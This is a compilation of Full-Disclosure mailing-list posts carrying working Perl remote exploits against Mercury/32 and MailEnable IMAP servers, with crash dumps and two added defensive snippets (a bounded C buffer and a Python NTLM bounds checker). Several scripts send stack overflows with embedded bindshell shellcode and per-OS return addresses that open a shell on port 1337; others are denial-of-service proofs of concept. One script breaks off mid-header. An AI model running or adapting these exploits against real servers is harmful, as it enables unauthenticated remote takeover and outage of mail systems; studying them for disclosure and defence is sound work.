continuation data. However, the calculation neglects to take into account
the length of the previously supplied command (1 LOGIN 900 x '\x20' {255}).

The result of the attached exploit is a DoS (given below), however, remote code
execution is possible in at least two different ways without authentication...

(b24.a70): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0456d70c ebx=41414141 ecx=7ffad000 edx=034a2970 esi=0500 edi=
eip=00441d88 esp=0456d6dc ebp=0456d6ec iopl=0 nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246
mercuryi!miconfig_proc_3+0xbacd:
0346ed48 8807mov byte ptr [edi],al  ds:0023:0457=??

(note this may be the same as BID 21110).
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 v4.01b (win32) remote exploit
# by mu-b - 28 Nov 2006
#
# - Tested on: Mercury/32 v4.01a (win32)
#              Mercury/32 v4.01b (win32)
#
# Stack-based buffer overflow caused by Mercury/32 concatenating
# continuation data into a fixed sized buffer disregarding
# the length of the original command, you do not require authentication.
#
# This is a little harder to exploit than usual since the
# stack frame in question calls end_thread before returning..
# buts it's still possible by at *least* two different ways...
# (i.e. controlling a pointer into sprintf and/or controlling
#  a pointer to be free()).
#

use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

print_header();

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { usage(); }

my $imapd_port = 143;
my $send_delay = 1;

my $NOP = 'A';
my $LEN = 9200;    #8928;
my $BUFLEN = 8192;

if (connect_host($target, $imapd_port)) {
    print("- * Connected\n");
    $buf = "1 LOGIN".(" " x ($LEN-$BUFLEN))."\{255\}\n";
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("- * Sending payload\n");
    $buf = $NOP x 255;
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("- * Sending payload 2\n");
    $buf = $NOP x $BUFLEN;
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("- * Successfully sent payload!\n");
}

sub print_header {
    print("Mercury/32 v4.01b (win32) remote exploit\n");
    print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
    print(qq(Usage: $0 -t hostname

     -t hostname: hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target) || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto  = getprotobyname('tcp')  || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)  || die("Error: $!\n");
    return(1337);
}
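The Mercury/32 bug above is a remaining-capacity calculation that ignores what the first command line already occupies before the literal continuation data is appended. As an added example, not code from the post or from Mercury/32, here is a command buffer that tracks its used length and rejects a continuation that does not fit, beside the flawed calculation that reports the whole buffer as free. The buffer is deliberately small and the IMAP lines are constructed for the demo; the `{255}` literal mirrors the post's description.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Fixed-size command buffer with a running length, used to assemble an IMAP
 * command from its first line plus the literal continuation data that
 * follows a "{n}" announcement. */
struct cmdbuf {
    char   data[64];   /* deliberately small for the demo */
    size_t used;       /* bytes already occupied, first line included */
};

/* The calculation the post describes as broken: "remaining" is derived from
 * the buffer's total size and ignores the bytes the first command line
 * already occupies, so a continuation as long as the whole buffer passes. */
size_t flawed_remaining(const struct cmdbuf *cb)
{
    (void)cb;                             /* cb->used is never consulted */
    return sizeof cb->data;
}

/* Correct remaining capacity: total size minus bytes used minus the NUL. */
size_t cmdbuf_remaining(const struct cmdbuf *cb)
{
    return sizeof cb->data - 1 - cb->used;
}

/* Append n bytes of continuation data. Returns 0 on success, -1 if the data
 * does not fit; the buffer is left unchanged on failure. */
int cmdbuf_append(struct cmdbuf *cb, const char *chunk, size_t n)
{
    if (n > cmdbuf_remaining(cb)) return -1;
    memcpy(cb->data + cb->used, chunk, n);
    cb->used += n;
    cb->data[cb->used] = '\0';
    return 0;
}

/* Start a command from its first line. */
int cmdbuf_start(struct cmdbuf *cb, const char *line)
{
    cb->used = 0;
    cb->data[0] = '\0';
    return cmdbuf_append(cb, line, strlen(line));
}

/* Constructed scenario (not real Mercury traffic): a LOGIN line announcing
 * a 255-byte literal, then the 255 bytes. Returns -1: rejected. */
int demo_overlong_literal(void)
{
    struct cmdbuf cb;
    char literal[255];
    memset(literal, 'A', sizeof literal);
    if (cmdbuf_start(&cb, "1 LOGIN {255}\r\n") != 0) return -2;
    return cmdbuf_append(&cb, literal, sizeof literal);
}

/* After that first line the flawed calculation over-reports the free space
 * (64 against the real 48). Returns 1 when it does. */
int demo_flawed_overestimates(void)
{
    struct cmdbuf cb;
    if (cmdbuf_start(&cb, "1 LOGIN {255}\r\n") != 0) return -2;
    return flawed_remaining(&cb) > cmdbuf_remaining(&cb);
}

/* A literal that fits; returns the assembled length (13 + 8 = 21). */
long demo_fitting_literal(void)
{
    struct cmdbuf cb;
    if (cmdbuf_start(&cb, "1 LOGIN {8}\r\n") != 0) return -2;
    if (cmdbuf_append(&cb, "secret01", 8) != 0) return -1;
    return (long)cb.used;
}

int main(void)
{
    printf("overlong=%d overestimates=%d fitting=%ld\n", demo_overlong_literal(),
           demo_flawed_overestimates(), demo_fitting_literal());
    return 0;
}
```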

[Full-disclosure] MailEnable v2.37 APPEND exploit

2007-03-02 Thread mu-b
Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the
latest). The vulnerability is a bog-standard stack based overflow in the
call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).

---
([EMAIL PROTECTED])


#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.35 (win32)
#              Mail Enable Professional v2.37 (win32)
#

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "\x33\xc9\x83\xe9\xb0".
  "\x81\xc4\xd0\xfd\xff\xff". # add %esp, -560
  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

# ff e4 - jmp %esp
my @offsets = ( "\x63\x37\x57\x7c", # Win2K Server SP4 KERNEL32.dll
                "\x38\x07\xd2\x77",
                "\xef\xbe\xad\xde"  # DoS
              );

print_header();

my $target;
my $offset;
my $user;
my $passwd;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (defined($arg{'u'})) { $user = $arg{'u'} }
if (defined($arg{'p'})) { $passwd = $arg{'p'} }
if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { usage(); }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
    print("only ".($#offsets+1)." targets known!!\n");
    exit(1);
} else {
    $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';

if (connect_host($target, $imapd_port)) {
    print("- * Connected\n");
    send(SOCKET, "1 LOGIN ".$user." ".$passwd."\r\n", 0);
    sleep($send_delay);

    print("- * Sending payload\n");
    $buf = "2 APPEND \"()\"\{".
           ($NOP x 128).
           "\xef\xbe\xad\xde".
           $offset.
           "\x01\xa3\x19\x03".
           ($NOP x 8 ).
           $zshell_win32_bind.
           "\}\r\n";
    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("- * Successfully sent payload!\n");
    print("- * nc ".$target." 1337 for shell...\n");
}

sub print_header {
    print("MailEnable Pro v2.32-7 remote exploit\n");
    print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
    print(qq(Usage: $0 -t hostname

     -t hostname: hostname to test
     -n num     : return addy offset number
     -u username: username for login
     -p password: usernames password
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target) || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto  = getprotobyname('tcp')  || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)  || die("Error: $!\n");
    return(1338);
}

[Full-disclosure] More MailEnable exploits..

2007-02-16 Thread mu-b
The following should somewhat specify any mention of unspecified in the
following BID's, patched as some idiots cannot resist trying to own
mailenable.com...

BID: 21252 (maildisable-v3.pl)
BID: 21492 (maildisable-v6.pl)

---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v3.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Thu Nov 23 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#
# what does this remind you off?
# Note: timing is quite critical with this!!, so change $send_delay
#       if it doesn't work
#

use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "\x33\xc9\x83\xe9\xb0".
  "\x81\xc4\xd0\xfd\xff\xff".
  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
  "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
  "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
  "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
  "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
  "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
  "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
  "\x4e\x33\xe4\x96\xcd\xcc\x32\x69";

# ff e4 - jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
                "\xef\xbe\xad\xde"  # DoS
              );

print_header();

my $target;
my $offset;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { usage(); }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
    print("only ".($#offsets+1)." targets known!!\n");
    exit(1);
} else {
    $offset = $offsets[$offset];
}

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';
my $START_PAD = 3;

if (connect_host($target, $imapd_port)) {
    print("- * Connected\n");
    send(SOCKET, "1 LOGIN {1022}\r\n", 0);
    sleep(2);

    print("- * Sending padding payload\n");
    # first recv  0x3fe, NULL tricks strncpy...
    send(SOCKET, "\x00".($NOP x 1020), 0);
    sleep($send_delay);

    print("- * Sending payload\n");
    $buf = ($NOP x $START_PAD).    # padding
           "\xee\xaf\xdc\xba".     # dummy var_0
           "\xef\xbe\xad\xde".     # EBP
           $offset.                # EIP
           "\xdc\xa3\x19\x03".     # dummy arg_0 \xdc\xa3\x19\x03 v2.33
           ($NOP x 4).             # NOPS
           $zshell_win32_bind.     # hellcode
           $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5);

    send(SOCKET, $buf, 0);
    sleep($send_delay);

    print("- * Successfully sent payload!\n");
    print("- * nc ".$target." 1337 for shell...\n");
}

sub print_header {
    print("MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n");
    print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
    print(qq(Usage: $0 -t hostname

     -t hostname: hostname to test
     -n num     : return addy offset number
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target) || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto  = getprotobyname('tcp')  || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)  || die("Error: $!\n");
    return(1338);
}
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional <=v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing

[Full-disclosure] MailEnable DoS POC

2007-02-14 Thread mu-b
The POC attached exploits an out of bounds memory read in the NTLM
authentication routines of MailEnable Pro/Enterprise. The problem lies in
the NTLM_UnPack_Type3 function of MENTLM.dll.

This appears to have been "silently patched" somewhere between versions 2.351
and 2.36-7 (observe the quotes).

(c34.dc0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=0040 edx= esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0 nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0146b238= ds:0023:8146920b=

---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#              Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

print_header();

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { usage(); }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
  sleep($send_delay);

  # first client line (base64, as the IMAP AUTHENTICATE exchange requires)
  $buf = ($PAD x 12).
         "\xfa\xff\xff\xff".
         ($PAD x 12);
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  # second client line: the type 3 blob handled by NTLM_UnPack_Type3
  $buf = ($PAD x 28).
         "\x00\x01".
         ($PAD x 2).
         "\xef\xbe\xad\xde";
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
}

sub print_header {
  print("MailEnable Pro <=v2.36 DoS POC\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
));

  exit(1);
}

sub connect_host {
  ($target, $port) = @_;
  $iaddr  = inet_aton($target)         || die("Error: $!\n");
  $paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto  = getprotobyname('tcp')      || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr)                      || die("Error: $!\n");
  return(1338);
}

[Full-disclosure] MailEnable DoS POC-2

2007-02-14 Thread mu-b
This version will work on the latest MailEnable v2.37..

Symantec seem to think this is the same issue as BID 20290, but it is
in fact, completely different... and somewhat unpatched..
---
([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

print_header();

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { usage(); }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
  sleep($send_delay);

  # first client line (base64, as the IMAP AUTHENTICATE exchange requires)
  $buf = ($PAD x 12).
         "\xfa\xff\xff\xff".
         ($PAD x 12);
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  # second client line: same type 3 blob as v5, different offset value
  $buf = ($PAD x 28).
         "\x00\x01".
         ($PAD x 2).
         "\xff\xff\xff\x7f";
  send(SOCKET, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
}

sub print_header {
  print("MailEnable Pro v2.37 DoS POC\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t hostname

 -t hostname: hostname to test
));

  exit(1);
}

sub connect_host {
  ($target, $port) = @_;
  $iaddr  = inet_aton($target)         || die("Error: $!\n");
  $paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto  = getprotobyname('tcp')      || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr)                      || die("Error: $!\n");
  return(1338);
}
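An added example, not code from mu-b's posts: a Python bounds check for the NTLM Type 3 security-buffer descriptors, i.e. the validation NTLM_UnPack_Type3 evidently skips before its rep movs copy, run over the second client line that the DoS POC and POC-2 above send. The descriptor layout is taken from MS-NLMP; reading the crash as the DomainName descriptor at offset 28 (Len 0x0100 = 256 bytes, matching the 0x40 dwords in ecx) is my inference from the POC bytes, and all function and constant names here are mine.

```python
import base64
import struct

# Offsets of the NTLM Type 3 security-buffer descriptors (MS-NLMP 2.2.1.3).
# Each descriptor is Len(2) | MaxLen(2) | BufferOffset(4), little-endian.
TYPE3_FIELDS = (("LmChallengeResponse", 12), ("NtChallengeResponse", 20),
                ("DomainName", 28), ("UserName", 36), ("Workstation", 44))

def check_type3(msg):
    """Return the bounds violations in an NTLM Type 3 blob ([] if none).

    A safe unpacker runs this before copying buf_off..buf_off+len; the
    crash above is that copy (rep movs) done on an unchecked descriptor.
    """
    problems = []
    if len(msg) < 12 or msg[:8] != b"NTLMSSP\x00" \
            or struct.unpack_from("<I", msg, 8)[0] != 3:
        problems.append("header: missing NTLMSSP signature or type != 3")
    for name, off in TYPE3_FIELDS:
        if off + 8 > len(msg):
            problems.append(f"{name}: descriptor truncated")
            continue
        length, _maxlen, buf_off = struct.unpack_from("<HHI", msg, off)
        # Python ints: offset + length cannot wrap like a 32-bit add.
        if length and buf_off + length > len(msg):
            problems.append(f"{name}: len {length} at offset {buf_off:#x} "
                            f"exceeds {len(msg)}-byte message")
    return problems

def check_imap_ntlm_line(line):
    """Check one base64 client continuation line of AUTHENTICATE NTLM."""
    return check_type3(base64.b64decode(line.strip(), validate=True))

def build_type3(domain, user, workstation):
    """Well-formed Type 3 with empty responses, for the negative case."""
    fields, payload, cursor = b"", b"", 64   # payload starts after flags
    for data in (b"", b"", domain, user, workstation, b""):
        fields += struct.pack("<HHI", len(data), len(data), cursor)
        payload, cursor = payload + data, cursor + len(data)
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + fields
            + struct.pack("<I", 0) + payload)

# Constructed inputs: the second client line of the DoS POC and of POC-2
# (28 bytes of 'A', Len 0x0100, MaxLen 'AA', then the bogus offset).
POC_TYPE3 = b"A" * 28 + b"\x00\x01" + b"AA" + b"\xef\xbe\xad\xde"
POC2_TYPE3 = b"A" * 28 + b"\x00\x01" + b"AA" + b"\xff\xff\xff\x7f"
POC2_LINE = base64.b64encode(POC2_TYPE3) + b"\r\n"  # as seen on the wire
```

The same check on the 36-byte POC blob also reports the UserName and Workstation descriptors as truncated, which is the other way a server can read past the message end.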